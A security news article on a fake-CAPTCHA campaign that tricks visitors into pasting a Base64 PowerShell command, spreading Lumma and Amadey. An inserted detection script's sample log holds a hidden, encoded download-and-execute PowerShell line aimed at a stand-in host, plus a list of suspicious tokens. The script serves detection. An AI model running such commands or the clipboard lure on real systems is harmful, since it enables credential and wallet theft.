Attackers are using a fake CAPTCHA as the initial infection vector to distribute malware. The campaign first targeted gamers, delivering the Lumma stealer through websites offering cracked games.
The malicious CAPTCHA is now also spreading through online resources that have nothing to do with games, such as adult sites, anime resources, file-sharing services, betting platforms, and web apps monetized through traffic, which widens the distribution network to a much broader pool of victims.
Researchers found that the ad network pushing the pages with the malicious CAPTCHA also carries legitimate, non-malicious offers; on any page that embeds the ad module, clicking anywhere on the page redirects the user to other resources.
The CAPTCHA delivers not only Lumma but also the Amadey Trojan, so understanding how the attackers and their distribution network operate is essential to avoiding the attack.
Unlike a genuine CAPTCHA, which is designed to protect a website from bots, this imitation exists only to promote shady resources and to lure visitors into running the attackers' code.
The Trojans are distributed through a CAPTCHA page that comes with step-by-step instructions. When the victim clicks the 'I'm not a robot' button, the page silently copies a line containing a Base64-encoded PowerShell command to the clipboard, and its instructions then direct the victim to paste and run that line.
Running that command launches PowerShell, which fetches a further obfuscated PowerShell script; this second stage downloads and runs the final payload, a stealer that harvests credentials and cryptocurrency wallets.
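The detection-side counterpart of the clipboard trick described above, added here as an example and not code from the article or the researchers it cites: a small triage routine that pulls the Base64 blob out of a `powershell -enc ...` command line, decodes it (PowerShell's `-EncodedCommand` is Base64 over UTF-16LE text) and flags download-and-execute tokens in the decoded script. The log line format (`parent|image|cmdline`), the sample entries and the `example.invalid` URL are all constructed for the example; the real campaign's command lines and hosts are not reproduced here. Treating `explorer.exe` as the parent is only a weak supporting signal, since that is what a command pasted into the Run dialog or File Explorer's address bar is spawned from, as well as what plenty of legitimate user activity looks like.

```python
"""Decode and triage Base64-encoded PowerShell launches from process-creation logs."""
import base64
import re
from typing import Optional

# -EncodedCommand may be abbreviated to any unambiguous prefix; -e, -ec, -en and
# -enc cover what is seen in practice. The blob itself is plain Base64.
ENC_SWITCH = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Tokens that indicate download-and-execute behaviour once the script is decoded.
SUSPICIOUS_TOKENS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string", "mshta",
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if absent or not valid."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")      # PowerShell encodes the script as UTF-16LE
    except (ValueError, UnicodeDecodeError):
        return None


def triage(line: str) -> dict:
    """Parse one 'parent|image|cmdline' log line (constructed format) and score it."""
    parent, image, cmdline = line.split("|", 2)
    decoded = decode_encoded_command(cmdline)
    # Drop the Base64 blob before keyword matching so random Base64 substrings
    # (e.g. "iex" inside the blob) cannot trigger a false hit.
    visible = ENC_SWITCH.sub("-enc <blob>", cmdline)
    text = (visible + " " + (decoded or "")).lower()

    reasons = []
    if decoded is not None:
        reasons.append("encoded command")
    if "-w hidden" in text or "windowstyle hidden" in text:
        reasons.append("hidden window")
    if parent.lower().endswith("explorer.exe"):
        reasons.append("spawned by explorer.exe (Run dialog / address bar)")
    hits = [t for t in SUSPICIOUS_TOKENS if t in text]
    reasons += [f"token:{t}" for t in hits]

    return {
        "image": image,
        "decoded": decoded,
        "reasons": reasons,
        # Only an encoded command that also contains download/execute tokens is
        # called suspicious; plain encoded admin scripts are common and benign.
        "suspicious": decoded is not None and bool(hits),
    }


def build_sample_log() -> list:
    """Constructed sample, not captured data: one fake-CAPTCHA-style launch,
    one benign encoded admin command, and one unrelated process."""
    def enc(script: str) -> str:
        return base64.b64encode(script.encode("utf-16-le")).decode()

    malicious = "iex (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2.ps1')"
    benign = "Get-Service | Where-Object Status -eq 'Running'"
    return [
        f"C:\\Windows\\explorer.exe|powershell.exe|powershell -w hidden -ep bypass -enc {enc(malicious)}",
        f"C:\\Windows\\System32\\services.exe|powershell.exe|powershell -enc {enc(benign)}",
        "C:\\Windows\\explorer.exe|notepad.exe|notepad.exe readme.txt",
    ]


if __name__ == "__main__":
    for entry in build_sample_log():
        r = triage(entry)
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} {r['image']:15} {', '.join(r['reasons'])}")
        if r["decoded"]:
            print(f"           decoded: {r['decoded']}")
```

The decode step matters more than the keyword list: a hidden-window, encoded PowerShell launch with `explorer.exe` as parent is exactly what a user pasting the clipboard contents into the Run dialog produces, and the decoded text is what lets an analyst see the staging URL rather than an opaque blob.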
The Lumma stealer searches the infected machine for cryptocurrency-related files and steals them, inspects browser extensions for cryptocurrency wallets and steals their data, and looks for password manager archives, exfiltrating their contents to the attackers' server.
The same campaign now also spreads the Amadey Trojan, together with a credential stealer, a VNC-based remote access module, and the Remcos remote access tool, to the victim's device, giving the attackers full access to it.
Some 140,000 users encountered the ad scripts; more than 20,000 of them were redirected to infected sites that showed fake update notifications or fake CAPTCHAs. Users in Brazil, Spain, Italy, and Russia were affected most often.